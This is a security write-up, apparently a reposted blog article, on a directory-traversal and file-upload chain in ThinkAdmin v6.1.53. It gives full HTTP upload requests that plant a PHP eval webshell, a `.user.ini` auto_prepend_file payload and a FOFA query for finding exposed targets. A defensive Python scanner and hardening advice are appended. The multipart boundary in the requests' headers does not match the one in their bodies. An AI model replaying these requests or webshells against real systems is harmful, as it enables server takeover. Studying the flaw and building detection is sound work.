ThinkAdmin directory traversal + file upload getshell
2024-1-3 10:31:52 Author: Ots安全

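Project introduction

ThinkAdmin is an open-source rapid-development framework released under the [MIT](https://mit-license.org/) license. It is a minimalist back-end management system based on the latest version of ThinkPHP6 (compatible with ThinkPHP8).

Official website: https://thinkadmin.top/

Audited version: ThinkAdmin v6.1.53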


FOFA: body="/admin/api.plugs/script"


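Vulnerability: directory traversal + file upload = getshell

Install via Composer as described on the official website; after installation, log in to the admin back end. First, set the file extensions that the back end allows for upload: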


http://localhost/admin/config/storage.html?spm=m-1-2-3

param: storage%5Bname_type%5D=xmd5&storage%5Blink_type%5D=none&storage%5Ballow_exts%5D=doc%2Cgif%2Cico%2Cjpg%2Cmp3%2Cmp4%2Cp12%2Cpem%2Cpng%2Czip%2Crar%2Cxls%2Cxlsx%2Chtaccess%2Cini&storage%5Blocal_http_protocol%5D=follow&storage%5Blocal_http_domain%5D=&storage%5Btype%5D=local


First, upload an arbitrary file whose content is a webshell:

POST /admin/api.upload/file HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCUB3l9pNDT4UzMSU
Cookie: user cookie
Host: IP:PORT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="key"


..\./1.zip
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="safe"


0
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="uptype"


local
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="file"; filename="1.zip"
Content-Type: image/png


<?php @eval($_POST[1]);?>
------WebKitFormBoundary3VyVEPpvQynFo76H--


Then build the payload and upload it:

http://localhost/admin/api.upload/file

POST /admin/api.upload/file HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCUB3l9pNDT4UzMSU
Cookie: user cookie
Host: IP:PORT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="key"

..\./.user.ini
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="safe"

0
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="uptype"

local
------WebKitFormBoundary3VyVEPpvQynFo76H
Content-Disposition: form-data; name="file"; filename="1.ini"
Content-Type: image/png

auto_prepend_file=1.zip
------WebKitFormBoundary3VyVEPpvQynFo76H--

As you can see, everything was uploaded successfully.

The webshell is also parsed successfully.
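
A defender-side check for the two upload requests above, as an added example that is not part of the original article or of ThinkAdmin's code: it parses a captured multipart/form-data body and flags a `key` that resolves outside the upload root or names a server configuration file, plus file content carrying PHP or `auto_prepend_file` markers. The function names, finding labels, name and marker lists, and the sample body are constructed for illustration, and treating `\` as a path separator is an assumption about the host.

```python
import posixpath
from email import message_from_bytes

# Assumptions (not from ThinkAdmin): names that reconfigure PHP or the web
# server for a directory, and byte markers worth an alert in an uploaded body.
SERVER_CONFIG_NAMES = {".user.ini", ".htaccess", "web.config"}
CONTENT_MARKERS = (b"<?php", b"auto_prepend_file", b"auto_append_file")

def resolve_key(key: str) -> str:
    # Assumption: the host treats "\" as a path separator. "." segments are
    # dropped by normpath, so "..\./x" resolves to "../x".
    return posixpath.normpath(key.strip().replace("\\", "/"))

def key_findings(key: str) -> list:
    resolved = resolve_key(key)
    findings = []
    if resolved.startswith("/") or resolved == ".." or resolved.startswith("../"):
        findings.append("key-escapes-upload-root")
    if posixpath.basename(resolved).lower() in SERVER_CONFIG_NAMES:
        findings.append("key-is-server-config-file")
    return findings

def scan_upload(content_type: str, body: bytes) -> list:
    """Findings for one captured multipart/form-data upload request."""
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    findings = []
    for part in (msg.get_payload() if msg.is_multipart() else []):
        name = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        if name == "key":
            findings += key_findings(data.decode("utf-8", "replace"))
        elif part.get_filename() is not None:
            lowered = data.lower()
            findings += ["content-marker:" + m.decode()
                         for m in CONTENT_MARKERS if m in lowered]
    return findings

# Constructed sample modelled on the second request in the article.
SAMPLE_TYPE = "multipart/form-data; boundary=----ConstructedBoundary"
SAMPLE_BODY = (
    b'------ConstructedBoundary\r\n'
    b'Content-Disposition: form-data; name="key"\r\n\r\n..\\./.user.ini\r\n'
    b'------ConstructedBoundary\r\n'
    b'Content-Disposition: form-data; name="file"; filename="1.ini"\r\n'
    b'Content-Type: image/png\r\n\r\n'
    b'auto_prepend_file=1.zip\r\n'
    b'------ConstructedBoundary--\r\n'
)

print(scan_upload(SAMPLE_TYPE, SAMPLE_BODY))
```

The same `key_findings` check can run server-side before a file is written, and the storage setting shown earlier should not list `ini` or `htaccess` among the allowed extensions.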



Article source: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247503612&idx=2&sn=8b9e30e96c77e246a93df780f7cf2c91&chksm=9a83f3eae932d7424c92c553268c6c2fb4e4bb539d727d8355d38f2c15a0932545f538970d10&scene=0&xtrack=1#rd